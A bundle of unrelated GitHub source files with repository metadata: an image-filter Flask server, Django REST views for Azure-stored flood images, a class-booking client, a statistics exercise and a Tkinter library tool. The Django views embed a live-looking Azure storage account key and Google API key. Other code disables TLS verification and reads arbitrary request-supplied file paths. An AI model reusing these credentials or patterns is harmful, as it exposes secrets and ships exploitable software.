walkin_from_date = datetime.datetime.strptime(
str(self.cleaned_data["walkin_from_date"]), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__gte=walkin_from_date)
| SQ(walkin_to_date__gte=walkin_from_date)
)
if self.cleaned_data["walkin_to_date"]:
walkin_to_date = datetime.datetime.strptime(
str(self.cleaned_data["walkin_to_date"]), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__gte=walkin_to_date)
| SQ(walkin_to_date__lte=walkin_to_date)
)
return sqs
else:
return []
def query(self):
if self.cleaned_data["q"]:
return self.cleaned_data["q"]
return None
# 13-11-2014
# 20-11-2014 29-11-2014
| MicroPyramid/opensource-job-portal | search/forms.py | forms.py | py | 7,863 | python | en | code | 336 | github-code | 36 | [
{
"api_name": "haystack.forms.SearchForm",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "django.forms.CharField",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.forms",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "django.... |
16132606164 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 18 10:01:52 2020
@author: Ferhat
"""
from flask import Flask, jsonify, json, Response,make_response,request
from flask_cors import CORS
# =============================================================================
# from flask_cors import cross_origin
# =============================================================================
import numpy as np
import cv2
#from flask.ext.httpauth import HTTPBasicAuth
# =============================================================================
# from luminoso_api import LuminosoClient
# from luminoso_api.errors import LuminosoError, LuminosoClientError
# from luminoso_api.json_stream import open_json_or_csv_somehow
# from werkzeug.datastructures import ImmutableMultiDict
# =============================================================================
import logging
import random
app = Flask(__name__, static_url_path = "")
CORS(app)
file_handler = logging.FileHandler('app.log')
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def return_img(new_img,name):
random_value = random.randrange(1000)
path1 ='newImage'+str(random_value)+'.png'
path2 = 'C:/xampp/htdocs/python/'+path1
cv2.imwrite(path2,new_img)
data = {
'imgNew' : path1,
'desc' : name
}
return data
def convol(img):
kernel = np.ones((5,5),np.float32)/25
dst = cv2.filter2D(img,-1,kernel)
return return_img(dst,"Convolution")
def averaging(img):
blur = cv2.blur(img,(5,5))
return return_img(blur,"Averaging")
def gaus_filter(img):
blur = cv2.GaussianBlur(img,(5,5),0)
return return_img(blur,"Gaussian Filtering")
def median(img):
median = cv2.medianBlur(img,5)
return return_img(median,"Median Filtering")
def bilateral(img):
blur = cv2.bilateralFilter(img,9,75,75)
return return_img(blur,"Bilateral Filtering")
def binary(img):
ret,thresh_binary = cv2.threshold(img,127,255,cv2.THRESH_BINARY)
return return_img(thresh_binary,"THRESH_BINARY ")
def binary_inv(img):
ret,thresh_binary_inv= cv2.threshold(img,127,255,cv2.THRESH_BINARY_INV)
return return_img(thresh_binary_inv,"THRESH Binary Inv")
def tozero(img):
ret,thresh_tozero = cv2.threshold(img,127,255,cv2.THRESH_TOZERO)
return return_img(thresh_tozero,"THRESH Tozero")
def trunc(img):
ret,thresh_trunc = cv2.threshold(img,127,255,cv2.THRESH_TRUNC)
return return_img(thresh_trunc,"THRESH Trunc")
def trunc_inv(img):
ret,thresh_trunc_inv = cv2.threshold(img,127,255,cv2.THRESH_TOZERO_INV)
return return_img(thresh_trunc_inv,"THRESH Tozero Inv")
@app.errorhandler(400)
def not_found(error):
app.logger.error('Bad Request - 400')
return make_response(jsonify( { 'error': 'Bad request' } ), 400)
@app.route('/image_process', methods = ['GET','POST'])
def get_test():
img_Path = request.args.get('img_path')
img_type = request.args.get('img_type')
image = cv2.imread(img_Path,0)
if img_type == "convol":
data = convol(image)
elif img_type == "averaging":
data = averaging(image)
elif img_type == "gaus_filter":
data = gaus_filter(image)
elif img_type == "median":
data = median(image)
elif img_type == "bilateral":
data = bilateral(image)
elif img_type == "binary":
data = binary(image)
elif img_type == "binary_inv":
data = binary_inv(image)
elif img_type == "trunc":
data = trunc(image)
elif img_type == "tozero":
data = tozero(image)
elif img_type == "trunc_inv":
data = trunc_inv(image)
else:
data = return_img(image,"No Image")
js = json.dumps(data)
resp = Response(js, status=200, mimetype='application/json')
resp.headers['Link'] = 'https://localhost/python/'
return resp
# return "ECHO: GET\n"
if __name__ == "__main__":
app.run(debug=True)
| RamazanFerhatSonmez/Image-Processing-Python | rest-server.py | rest-server.py | py | 4,161 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "logging.FileHandler",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"l... |
15539017308 | from functools import reduce
from decimal import Decimal
# From stdin:
# num_of_elem=int(input())
# elements=list(map(int,input().split()))
# From a file:
num_of_elem=0
elements=""
with open('input/input03.txt','r') as file_in:
file_lines=file_in.readlines()
num_of_elem=int(file_lines[0])
elements=file_lines[1]
elements=list(map(int,elements.split()))
mean=Decimal(reduce(lambda x, y: x + y,elements)/num_of_elem)
oddNumber=num_of_elem %2 == 0
median=0
if not oddNumber :
median=elements[int((num_of_elem+1)/2)-1]
else:
elements.sort()
middle_left=elements[int(num_of_elem/2)-1]
middle_right=elements[int(num_of_elem/2)]
median=Decimal((middle_left+middle_right)/2.0)
elements_set=sorted(set(elements))
mode=None
mode_index_number=None
mode = count = elements.count(elements_set[0])
mode_index_number = elements_set[0]
for i in elements_set[1:len(elements_set)]:
count = elements.count(i)
if count > mode:
mode = count
mode_index_number = i
elif count == mode and i < mode_index_number:
mode_index_number = i
print(round(mean,1))
print(round(median,1))
print(mode_index_number) | gianv9/HackerRanksSubmissions | 10 Days of Statistics/Day 0/Mean Median and Mode/solution.py | solution.py | py | 1,156 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "decimal.Decimal",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "functools.reduce",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "decimal.Decimal",
"line_number": 27,
"usage_type": "call"
}
] |
28230488326 | from requests import Request, Session
import config
import json
__all__=['SendBookClass', 'SendFindClass']
config_FindClass = config.FindClass()
config_BookClass = config.BookClass()
http_proxy = "http://localhost:8888"
https_proxy = "https://localhost:8888"
ftp_proxy = "ftp://10.10.1.10:3128"
#cafile = 'FiddlerRoot.cer'
proxyDict = {
"http" : http_proxy,
"https" : https_proxy,
"ftp" : ftp_proxy
}
#print(config_FindClass.headers)
class CultSend:
    """Base helper that prepares and sends one HTTP request, routed through
    the module-level debugging proxy (``proxyDict``)."""
    def __init__(self,url=None, headers=None, type=None, payload = None):
        # NOTE: 'type' shadows the builtin; name kept for interface stability.
        self.url = url
        self.headers = headers
        self.type = type
        self.payload = payload
    def __prepare_session(self):
        """Build a Session and a PreparedRequest from this instance's state."""
        s = Session()
        #params_arr = [self.type, self.url, self.headers, self.payload]
        req = self.__utility_params()
        print(req.url)
        prepped = req.prepare()
        #prepped = self.__utility_headers(prepped)
        return s, prepped
    def send_request(self):
        """Send the prepared request.

        TLS verification is disabled (verify=False) so the intercepting
        local proxy can decrypt the traffic -- debugging setup only.
        """
        s, prepped = self.__prepare_session()
        print(prepped.headers)
        return s.send(prepped,proxies=proxyDict,verify=False)
    def __utility_headers(self, prepped):
        """Currently unused: strips Accept-Encoding from GET requests."""
        #print(prepped.headers)
        if self.type == 'GET':
            del prepped.headers['Accept-Encoding']
        return prepped
    def __utility_params(self):
        """Build the Request: GET carries no body, anything else sends the
        payload serialized as JSON."""
        if self.type == 'GET':
            return Request(self.type, self.url,headers=self.headers)
        else:
            print(self.payload)
            return Request(self.type,self.url,data=json.dumps(self.payload), headers=self.headers)
class SendFindClass(CultSend):
    """CultSend preconfigured from the module-level FindClass settings."""
    def __init__(self):
        cfg = config_FindClass
        super().__init__(cfg.url, cfg.headers, cfg.type)
class SendBookClass(CultSend):
    """CultSend preconfigured to book the class identified by *book_id*."""
    def __init__(self, book_id):
        cfg = config_BookClass
        # The configured URL is a template with one slot for the class id.
        super().__init__(cfg.url.format(book_id), cfg.headers, cfg.type,
                         cfg.payload)
| akhildevelops/cult-fitness-auto-book | cult_network.py | cult_network.py | py | 2,133 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "config.FindClass",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "config.BookClass",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "requests.Session",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "requests.Request",
... |
30846787707 | # image/views.py
from rest_framework.response import Response
from rest_framework import generics, status, filters
from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from django.core.serializers.json import DjangoJSONEncoder
from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseNotFound
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient
import json
import os
import google_streetview.api
import random
import secrets
import base64
from .serializers import ImageSerializer, ProfileSerializer, UserSerializer
from .models import Image, Profile
#SendView: sends blob to backend and backend sends blob to azure
#ReceiveView: front end sends request for blob, backend uses request to get blob from azure and sends it to frontend
#Load: front end sends streetview info and backend saves jpg to blob
def sendToBlob(blob, blob_name):
    """Upload *blob* into the 'blupix-app' Azure container as *blob_name*.

    upload_blob() is called without overwrite, so it raises if a blob with
    the same name already exists.  The container listing printed at the end
    is debugging output.
    """
    # NOTE(review): storage credentials are hard-coded in source; they
    # should be moved to settings/environment and rotated.
    connect_str = "DefaultEndpointsProtocol=https;AccountName=blupix;AccountKey=8KBz2PiH671bmhUYvjO+iAs1mh+TIx31DVgnGKzygcv8ItnRgyGtewwZkVgS7aaQ8VB6z6qY/Gqh9lTTTkrx/g==;EndpointSuffix=core.windows.net"
    blob_service_client = BlobServiceClient.from_connection_string(connect_str)
    container_client = blob_service_client.get_container_client("blupix-app")
    blob_client = blob_service_client.get_blob_client(container="blupix-app", blob=blob_name)
    blob_client.upload_blob(blob)
    blob_list = container_client.list_blobs()
    for blob in blob_list:
        print("\t" + blob.name)
class SendView(APIView):
    """POST {file, blob_name}: store the uploaded data in Azure blob storage
    and echo the blob name back on success."""
    def post(self, request):
        try:
            blob = request.data['file']
            blob_name = request.data['blob_name']
            sendToBlob(blob, blob_name)
        except Exception as ex:
            # Any failure (missing keys, Azure errors) collapses into one
            # generic error payload; details only go to the console.
            print('Exception:')
            print(ex)
            return Response({"Error": "Problem with SendView"})
        return Response({"blob_name": request.data['blob_name']})
class ReceiveView(APIView):
    """POST {blob_name}: download the named blob from Azure and return it
    as a raw image/jpeg HTTP response."""
    def post(self, request):
        # NOTE(review): hard-coded storage credentials (same string as in
        # sendToBlob) -- move to settings/environment.
        connect_str = "DefaultEndpointsProtocol=https;AccountName=blupix;AccountKey=8KBz2PiH671bmhUYvjO+iAs1mh+TIx31DVgnGKzygcv8ItnRgyGtewwZkVgS7aaQ8VB6z6qY/Gqh9lTTTkrx/g==;EndpointSuffix=core.windows.net"
        try:
            blob_service_client = BlobServiceClient.from_connection_string(connect_str)
            blob_client = blob_service_client.get_blob_client(container="blupix-app", blob=request.data['blob_name'])
            blob = blob_client.download_blob()
            return HttpResponse(blob.readall(), content_type="image/jpeg")
        except Exception as ex:
            print('Exception:')
            print(ex)
            return Response({"Error": "Problem with ReceiveView"})
class KeyView(APIView):
    """Hand the Google Street View API key to the frontend."""
    def get(self, request):
        # NOTE(review): the key is hard-coded in source; consider loading
        # it from configuration instead.
        api_key = "AIzaSyD7blO0Y7Z-Jf2rRFyuo2CrQa7kEXRy1po"
        return Response({"key": api_key})
class LoadView(APIView):
    """POST Street View parameters: fetch the image via the Street View
    API, stage it on local disk under a random name, base64-encode it,
    upload it to Azure, and return the generated blob name."""
    def post(self, request):
        data = request.data
        params = [{
            'size': data["size"], # max 640x640 pixels
            'location': data["location"],
            'heading': data["heading"],
            'pitch': data["pitch"],
            "fov": data["fov"],
            'key': "AIzaSyD7blO0Y7Z-Jf2rRFyuo2CrQa7kEXRy1po"
        }]
        # Create a results object
        results = google_streetview.api.results(params)
        image_file = "media/pre_images"
        results.download_links(image_file)
        # Random (not cryptographically meaningful) 0-99999 filename;
        # NOTE(review): collisions are possible and upload_blob would then
        # raise on the duplicate name.
        random.seed(secrets.token_bytes(4))
        new_file_name = str(random.randint(0, 99999))
        print("load: " + new_file_name)
        # google_streetview always writes gsv_0.jpg + metadata.json.
        os.rename("media/pre_images/gsv_0.jpg", "media/pre_images/" + new_file_name + ".jpg")
        os.remove("media/pre_images/metadata.json")
        upload_file_path = os.getcwd()+ "/" + "/media/pre_images/" + new_file_name + ".jpg"
        with open(upload_file_path, "rb") as data:
            encoded = base64.b64encode(data.read())
        # Stored as a data-URI so the frontend can render it directly.
        img = b'data:image/jpg;base64,' + encoded
        sendToBlob(img, new_file_name)
        os.remove(upload_file_path)
        return Response({"blob_name": new_file_name})
class LoginView(APIView):
    """Authenticate by username+password or phone_number+password and
    return the matching profile as a one-element JSON list."""
    def get(self, request):
        # Login is POST-only.
        return Response({"Failure": "Incorrect URL"})
    def post(self, request):
        password = request.data["password"]
        profile = None
        if "username" in request.data:
            username = request.data["username"]
            try:
                user = User.objects.get(username=username)
                profile = Profile.objects.get(user=user)
            except:
                # NOTE(review): bare except also hides unrelated errors.
                return Response({"Failure": "Can't find username"})
        elif "phone_number" in request.data:
            phone_number = request.data["phone_number"]
            try:
                profile = Profile.objects.get(phone_number=phone_number)
            except:
                return Response({"Failure": "Can't find phone_number"})
        else:
            return Response({"Failure": "Incorrect information sent"})
        # Banned users are rejected before the password is even checked.
        if profile.banned == True:
            return Response({"Failure": "this user is banned!"})
        correct_pw = profile.user.check_password(password)
        if correct_pw:
            prof_dict = {
                "id": profile.id,
                "username": profile.user.username,
                "phone_number": profile.phone_number,
                "is_admin": profile.is_admin,
                "approved_by_admin": profile.approved_by_admin,
                "banned": profile.banned
            }
            profiles = []
            profiles.append(prof_dict)
            # dumps/loads round-trip uses DjangoJSONEncoder for dates etc.
            return Response(json.loads(json.dumps(profiles, cls=DjangoJSONEncoder)))
        else:
            return Response({"Failure!": "Incorrect Password"})
class ProfileApproveView(generics.ListCreateAPIView):
    """List every profile that has not yet been approved by an admin."""
    def get(self, request): #returns all profiles not approved by admin
        unapproved_profiles = Profile.objects.filter(approved_by_admin=False)
        profiles = []
        for p in unapproved_profiles:
            prof_dict = {
                "id": p.id,
                "username": p.user.username,
                "phone_number": p.phone_number,
                "is_admin": p.is_admin,
                "approved_by_admin": p.approved_by_admin,
                "banned": p.banned
            }
            profiles.append(prof_dict)
        # dumps/loads round-trip via DjangoJSONEncoder handles dates etc.
        return Response({"unapproved_profiles": json.loads(json.dumps(profiles, cls=DjangoJSONEncoder))})
class ProfileView(generics.ListCreateAPIView):
    """CRUD endpoint for user profiles (list/detail, create, update, delete)."""
    serializer_class = ProfileSerializer
    queryset = Profile.objects.all()
    def get(self, requset, pk=None): #used to get a list of all users
        # NOTE(review): parameter name 'requset' is a typo for 'request';
        # harmless because Django passes it positionally and it is unused.
        q = []
        profiles = []
        if pk == None:
            q = self.get_queryset()
        else:
            q.append(get_object_or_404(Profile.objects.all(), pk=pk))
        for p in q:
            prof_dict = {
                "id": p.id,
                "username": p.user.username,
                "phone_number": p.phone_number,
                "is_admin": p.is_admin,
                "approved_by_admin": p.approved_by_admin,
                "banned": p.banned
            }
            print(prof_dict)
            profiles.append(prof_dict)
        return Response(json.loads(json.dumps(profiles, cls=DjangoJSONEncoder)))
    def post(self, request): #used to create a new user
        q = request.data
        username = q["username"]
        password = q["password"]
        phone_number = q["phone_number"]
        is_admin = q["is_admin"]
        approved_by_admin = q["approved_by_admin"]
        # Enforce uniqueness of username and phone_number up front.
        if User.objects.filter(username=username).exists():
            return Response({"Failure!": "A user with this username already exists"})
        if Profile.objects.filter(phone_number=phone_number).exists():
            return Response({"Failure!": "A user with this phone_number already exists"})
        # NOTE(review): create_object is called unbound with self passed
        # explicitly -- unusual but functional given the serializer API.
        profile = self.serializer_class.create_object(self,username, password, phone_number, is_admin, approved_by_admin)
        return Response({"Success!": "User {} was created!".format(profile.user.username)})
    def put(self, request, pk): #updated profile information
        profile = get_object_or_404(Profile.objects.all(), pk=pk)
        data = request.data
        updated_profile = self.serializer_class.update_profile(self, profile, data)
        return Response({"Success!": "User {} was updated!".format(updated_profile.user.username)}, status=204)
    def delete(self, request, pk):
        """Delete both the Profile and its underlying auth User."""
        profile = get_object_or_404(Profile.objects.all(), pk=pk)
        username = profile.user.username
        profile.user.delete()
        profile.delete()
        # NOTE(review): the payload here is a set literal, not a dict --
        # presumably unintended; confirm what the frontend expects.
        return Response({"Profile for {} was deleted".format(username)}, status=204)
class ImageView(APIView):
    """CRUD endpoint for Image records; delete also removes the Azure blob."""
    def get(self, request, pk = None): #either returns one image (by id number) or all images
        if pk == None:
            images = Image.objects.all()
            serializer_class = ImageSerializer(images, many = True)
        else:
            image = get_object_or_404(Image.objects.all(), pk=pk)
            serializer_class = ImageSerializer(image, many = False)
        return Response({"images": serializer_class.data})
    def post(self, request):
        """Create a new Image record from the request payload."""
        image_serializer = ImageSerializer(data=request.data)
        if image_serializer.is_valid():
            image_serializer.save()
            return Response(image_serializer.data, status=status.HTTP_201_CREATED)
        else:
            print('error', image_serializer.errors)
            return Response(image_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    def put(self, request, pk):
        """Partially update an Image from the 'image' key of the payload."""
        saved_image = get_object_or_404(Image.objects.all(), pk=pk)
        data = request.data.get('image')
        serializer_class = ImageSerializer(instance=saved_image, data=data, partial=True)
        if serializer_class.is_valid(raise_exception=True):
            image_saved = serializer_class.save()
        return Response({"success": "Image '{}' has been updated successfully".format(image_saved)})
    def delete(self, request, pk):
        """Delete the DB record; best-effort delete of the backing blob."""
        image = get_object_or_404(Image.objects.all(), pk=pk)
        try:
            blob_name = image.blob_name
            # NOTE(review): hard-coded storage credentials, duplicated from
            # sendToBlob -- centralise in settings.
            connect_str = "DefaultEndpointsProtocol=https;AccountName=blupix;AccountKey=8KBz2PiH671bmhUYvjO+iAs1mh+TIx31DVgnGKzygcv8ItnRgyGtewwZkVgS7aaQ8VB6z6qY/Gqh9lTTTkrx/g==;EndpointSuffix=core.windows.net"
            blob_service_client = BlobServiceClient.from_connection_string(connect_str)
            blob_client = blob_service_client.get_blob_client(container="blupix-app", blob=blob_name)
            blob_client.delete_blob()
        except:
            # Deliberate best-effort: a missing blob must not block deletion.
            pass
        image.delete()
        return Response({"success": "Image '{}' has been updated deleted".format(pk)}, status=204)
class DataSearch(generics.ListCreateAPIView):
    """Search endpoint over post-flood images with optional pre-flood pairs."""
    def createJSONObj(self, post_images):
        """Serialize each post image (plus its paired pre image, if any)
        into a JSON-safe list of dicts.

        Missing uploader profiles and missing pre images degrade to the
        string "null" rather than failing the whole response.
        """
        JSONList = []
        for post in post_images:
            try:
                #post_user = get_object_or_404(Profile, id=post.user_id_of_upload)
                post_user = Profile.objects.get(id=post.user_id_of_upload)
                image_dict = {
                    "postID" : post.id,
                    "post_blob_name" : post.blob_name,
                    "position": {
                        "lat" : post.latitude,
                        "lng" : post.longitude
                    },
                    "address" : post.address,
                    "floodDate" : post.flood_date,
                    "postSource" : post.source,
                    "pairAttempted" : post.pair_attempted,
                    "username_of_post": post_user.user.username,
                    "approved_user": post_user.approved_by_admin
                }
            except:
                # Uploader not found (or lookup failed): same dict with
                # the user fields nulled out.
                image_dict = {
                    "postID" : post.id,
                    "post_blob_name" : post.blob_name,
                    "position": {
                        "lat" : post.latitude,
                        "lng" : post.longitude
                    },
                    "address" : post.address,
                    "floodDate" : post.flood_date,
                    "postSource" : post.source,
                    "pairAttempted" : post.pair_attempted,
                    "username_of_post": "null",
                    "approved_user": "null"
                }
            try:
                pre_image = Image.objects.get(id=post.pair_index)
                #pre_profile = get_object_or_404(Profile, id=pre_image.user_id_of_upload)
                image_dict["preID"] = pre_image.id
                image_dict["pre_blob_name"] = pre_image.blob_name
                image_dict["preSource"] = pre_image.source
                image_dict["map_url"] = pre_image.Maps_URL
                # isPaired is reported as the string "True"/"False".
                if pre_image.approved_by_admin == True:
                    image_dict["isPaired"] = "True"
                else:
                    image_dict["isPaired"] = "False"
                try:
                    pre_profile = Profile.objects.get(id=pre_image.user_id_of_upload)
                    image_dict["username_of_pre"] = pre_profile.user.username
                except Profile.DoesNotExist:
                    image_dict["username_of_pre"] = "null"
            except Image.DoesNotExist:
                image_dict["username_of_pre"] = "null"
                # NOTE(review): "predID" looks like a typo for "preID" --
                # confirm which key the frontend reads in the unpaired case.
                image_dict["predID"] = "null"
                image_dict["pre_blob_name"] = "null"
                image_dict["preSource"] = "null"
                image_dict["isPaired"] = "False"
            JSONList.append(image_dict)
        return(json.loads(json.dumps(JSONList, cls=DjangoJSONEncoder)))
    def get(self, request): #return all unapproved images
        # NOTE(review): approved_by_admin is filtered with the string
        # "False" here, not the boolean -- verify against the model field.
        post_images = Image.objects.filter(pre_post = True, approved_by_admin="False")
        return Response(self.createJSONObj(post_images))
    def post(self, request):
        """Filter post images by lat/long/date bounds and pairing status,
        then keep only those uploaded by admin-approved users."""
        q = request.data.get("data")
        post_images = []
        post_images = Image.objects.filter(pre_post = True, latitude__gte=q["MinLat"], latitude__lte=q["MaxLat"], longitude__gte=q["MinLong"],
            longitude__lte=q["MaxLong"], flood_date__gte=q["MinDate"], flood_date__lte=q["MaxDate"])
        images = []
        if q["PairingStatus"] == "paired":
            # Paired: both post and its pre image must be approved.
            for p in post_images:
                if p.approved_by_admin == True:
                    try:
                        pre_image = Image.objects.get(id=p.pair_index)
                        if pre_image.approved_by_admin == True:
                            images.append(p)
                    except:
                        print("problem with paired")
                        continue
        elif q["PairingStatus"] == "unpaired":
            # Unpaired: approval states differ, or no pre image exists.
            for p in post_images:
                try:
                    pre_image = Image.objects.get(id=p.pair_index)
                    if p.approved_by_admin != pre_image.approved_by_admin:
                        images.append(p)
                except Image.DoesNotExist:
                    images.append(p)
                    continue
        else:
            # Any other status: approved posts, plus unapproved posts whose
            # pre image is approved (may append the same post twice).
            for p in post_images:
                if p.approved_by_admin == True:
                    images.append(p)
                try:
                    pre_image = Image.objects.get(id=p.pair_index)
                    if p.approved_by_admin == False and pre_image.approved_by_admin == True:
                        images.append(p)
                except Image.DoesNotExist:
                    print("You are trying to access a pre_image that does not exist")
                    continue
        approved_user_images = []
        for i in images:
            try:
                #profile = get_object_or_404(Profile, id=i.user_id_of_upload)
                profile = Profile.objects.get(id=i.user_id_of_upload)
                if profile.approved_by_admin == True:
                    approved_user_images.append(i)
            except:
                print("user doesn't exit")
                continue
        return Response(self.createJSONObj(approved_user_images))
| ngade98/waterlogged_heroku | waterlogged/views.py | views.py | py | 16,109 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "azure.storage.blob.BlobServiceClient.from_connection_string",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "azure.storage.blob.BlobServiceClient",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "rest_framework.views.APIView",
"line_number"... |
36060957275 | # list of registered users - pdf - full format
# list of users who availed book - name, ISBN, borrowDate and returnDate
# list of users with fine amount - name and fee pending
# send notification about the due submit and late fee - sends notification
from db_read import database
from fpdf import FPDF
from tkinter import *
from tkinter import messagebox
from twilio.rest import Client
def registered_users_list():
    """Export every registered user to Users.pdf, one page per user.

    Reads the whole "Users" subtree from the Firebase database and writes
    each attribute as a "key->value" line.
    """
    try:
        user = database.child("Users").get().val()
        pdf = FPDF()
        for i in user:
            pdf.add_page()
            for j in user[i]:
                txt = j + "->" + user[i][j]
                pdf.set_font("Arial", size=15)
                pdf.cell(200, 10, txt=txt, ln=1, align='L')
        pdf.output("Users.pdf")
        messagebox.showinfo('Success', "PDF saved Successfully")
    except:
        # NOTE(review): bare except also masks PDF/IO errors, not just
        # an empty user tree.
        messagebox.showerror('Error', "No Users.")
def borrower():
    """Open the "Add Borrower" window and record a book loan.

    On submit: validates the user and ISBN against Firebase, decrements
    the book's quantity, and writes an entry under BorrowerList/<user>/<isbn>.
    """
    def borrower_add():
        # Handler for the Update button / Return key.
        if name.get() == "" or isbn.get() == "" or title.get() == "" or date.get() == "" or due_date.get() == "":
            messagebox.showerror('Error', "All fields are required", parent=borrower_window)
        else:
            if (database.child("Users").child(name.get()).get().val() and database.child("Books").child(isbn.get()).get().val()) is not None:
                try:
                    quantity = int(database.child("Books").child(isbn.get()).child("Quantity").get().val())
                    if quantity > 0:
                        database.child("Books").child(isbn.get()).update({
                            "Quantity": str(quantity - 1)
                        })
                        data = {
                            "Username": name.get(),
                            "ISBN": isbn.get(),
                            "Title": title.get(),
                            "Date": date.get(),
                            "Due Date": due_date.get()
                        }
                        database.child("BorrowerList").child(name.get()).child(isbn.get()).set(data)
                        messagebox.showinfo('Success', "Data Updated Successfully", parent=borrower_window)
                        borrower_window.destroy()
                    else:
                        messagebox.showerror('Error', "Book currently unavailable.", parent=borrower_window)
                except:
                    messagebox.showerror('Error', "Try again later", parent=borrower_window)
                    borrower_window.destroy()
            else:
                messagebox.showerror('Error', "Invalid ISBN or User.", parent=borrower_window)
                borrower_window.destroy()
    borrower_window = Tk()
    borrower_window.title('Add Borrower')
    borrower_window.geometry('500x600')
    heading = Label(borrower_window, text="Add Borrower", font=('Times New Roman', 20, 'bold'))
    heading.place(x=80, y=60)
    # NOTE(review): each of name/isbn/title/date/due_date is rebound three
    # times (Label -> StringVar -> Entry); borrower_add() ends up calling
    # .get() on the Entry widgets.  Works, but fragile -- worth renaming.
    name = Label(borrower_window, text="Username :", font='Verdana 10 bold')
    name.place(x=80, y=160)
    isbn = Label(borrower_window, text="ISBN :", font='Verdana 10 bold')
    isbn.place(x=80, y=190)
    title = Label(borrower_window, text="Title :", font='Verdana 10 bold')
    title.place(x=80, y=220)
    date = Label(borrower_window, text="Date Borrowed:", font='Verdana 10 bold')
    date.place(x=80, y=250)
    due_date = Label(borrower_window, text="Due Date :", font='Verdana 10 bold')
    due_date.place(x=80, y=280)
    name = StringVar()
    isbn = StringVar()
    title = StringVar()
    date = StringVar()
    due_date = StringVar()
    name = Entry(borrower_window, width=40, textvariable=name)
    name.place(x=200, y=163)
    isbn = Entry(borrower_window, width=40, textvariable=isbn)
    isbn.place(x=200, y=193)
    title = Entry(borrower_window, width=40, textvariable=title)
    title.place(x=200, y=223)
    date = Entry(borrower_window, width=40, textvariable=date)
    date.place(x=200, y=253)
    due_date = Entry(borrower_window, width=40, textvariable=due_date)
    due_date.place(x=200, y=283)
    btn_signup = Button(borrower_window, text=" Update", font=('Bookman antiqua', 12, 'bold'), command=borrower_add,
                        bg='#2176F2',
                        fg='white')
    btn_signup.place(x=200, y=313)
    borrower_window.bind('<Return>', lambda event: borrower_add())
    borrower_window.mainloop()
def return_book():
    """Open the "Add Returner" window and record a book return.

    On submit: verifies the loan exists, increments the book's quantity,
    adds any late fee to DueList/<user>, moves the record from BorrowerList
    to ReturnerList.
    """
    def return_add():
        # Handler for the Update button / Return key.
        if name.get() == "" or isbn.get() == "" or title.get() == "" or date.get() == "":
            messagebox.showerror('Error', "All fields are required", parent=return_window)
        else:
            if (database.child("BorrowerList").child(name.get()).child(isbn.get()).get().val()) is not None:
                try:
                    quantity = int(database.child("Books").child(isbn.get()).child("Quantity").get().val())
                    database.child("Books").child(isbn.get()).update({
                        "Quantity": str(quantity + 1)
                    })
                    due_amount = (database.child("DueList").child(name.get()).get().val())
                    amount = int(due_amount['Due Amount'])
                    database.child("DueList").child(name.get()).update({
                        "Due Amount": str(amount + int(late_fees.get()))
                    })
                    data = {
                        "Username": name.get(),
                        "ISBN": isbn.get(),
                        "Title": title.get(),
                        "Date": date.get(),
                        "Due amount": late_fees.get()
                    }
                    database.child("BorrowerList").child(name.get()).child(isbn.get()).remove()
                    database.child("ReturnerList").child(name.get()).child(isbn.get()).set(data)
                    messagebox.showinfo('Success', "Data Updated Successfully", parent=return_window)
                    return_window.destroy()
                except:
                    messagebox.showerror('Error', "Try again later", parent=return_window)
                    return_window.destroy()
            else:
                messagebox.showerror('Error', "User haven't borrowed yet.", parent=return_window)
                return_window.destroy()
    return_window = Tk()
    return_window.title('Return Window')
    return_window.geometry('500x600')
    heading = Label(return_window, text="Add Returner", font=('Times New Roman', 20, 'bold'))
    heading.place(x=80, y=60)
    # NOTE(review): same Label -> var -> Entry rebinding pattern as in
    # borrower(); return_add() reads the Entry widgets via .get().
    name = Label(return_window, text="Username :", font='Verdana 10 bold')
    name.place(x=80, y=160)
    isbn = Label(return_window, text="ISBN :", font='Verdana 10 bold')
    isbn.place(x=80, y=190)
    title = Label(return_window, text="Title :", font='Verdana 10 bold')
    title.place(x=80, y=220)
    date = Label(return_window, text="Return Date:", font='Verdana 10 bold')
    date.place(x=80, y=250)
    late_fees = Label(return_window, text="Due amount :", font='Verdana 10 bold')
    late_fees.place(x=80, y=280)
    name = StringVar()
    isbn = StringVar()
    title = StringVar()
    date = StringVar()
    late_fees = IntVar(return_window, value=0)
    name = Entry(return_window, width=40, textvariable=name)
    name.place(x=200, y=163)
    isbn = Entry(return_window, width=40, textvariable=isbn)
    isbn.place(x=200, y=193)
    title = Entry(return_window, width=40, textvariable=title)
    title.place(x=200, y=223)
    date = Entry(return_window, width=40, textvariable=date)
    date.place(x=200, y=253)
    late_fees = Entry(return_window, width=40, textvariable=late_fees)
    late_fees.place(x=200, y=283)
    btn_signup = Button(return_window, text=" Update", font=('Bookman antiqua', 12, 'bold'), command=return_add,
                        bg='#2176F2',
                        fg='white')
    btn_signup.place(x=200, y=313)
    return_window.bind('<Return>', lambda event: return_add())
    return_window.mainloop()
def pdf_borrower():
    """Export the current BorrowerList to BorrowedUsers.pdf.

    One page per borrower: phone number header followed by every field of
    every borrowed book.
    """
    try:
